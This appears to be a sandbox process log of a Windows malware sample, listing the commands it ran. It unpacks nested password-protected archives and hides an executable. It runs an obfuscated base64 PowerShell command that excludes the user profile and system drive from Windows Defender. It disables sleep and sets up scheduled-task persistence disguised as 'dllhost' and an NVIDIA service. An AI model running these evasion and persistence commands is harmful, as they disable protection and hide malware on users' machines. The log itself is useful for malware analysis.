mode.com mode 65,10
29607z.exe 7z.exe e file.zip -p30715460265981646240356924 -oextracted
30047z.exe 7z.exe e extracted/file_3.zip -oextracted
30527z.exe 7z.exe e extracted/file_2.zip -oextracted
20527z.exe 7z.exe e extracted/file_1.zip -oextracted
2148attrib.exe attrib +H "KiZuNa.exe"
1304cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAGkASAA2AE8AWQBTAEUAVQBpAEUAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AGMAeQBBAGQAMwA1AGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMARQBUAG8AVABFAFMASwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADIATgBvADIAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
2480powershell.exe powershell -EncodedCommand "PAAjAGkASAA2AE8AWQBTAEUAVQBpAEUAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB5AGMAeQBBAGQAMwA1AGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMARQBUAG8AVABFAFMASwBCACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADIATgBvADIAIwA+AA=="
2552powercfg.exe powercfg /x -hibernate-timeout-ac 0
2808powercfg.exe powercfg /x -hibernate-timeout-dc 0
2860powercfg.exe powercfg /x -standby-timeout-ac 0
2980powercfg.exe powercfg /x -standby-timeout-dc 0
3048powercfg.exe powercfg /hibernate off
2100cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2020schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2628cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9349" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2264schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9349" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2732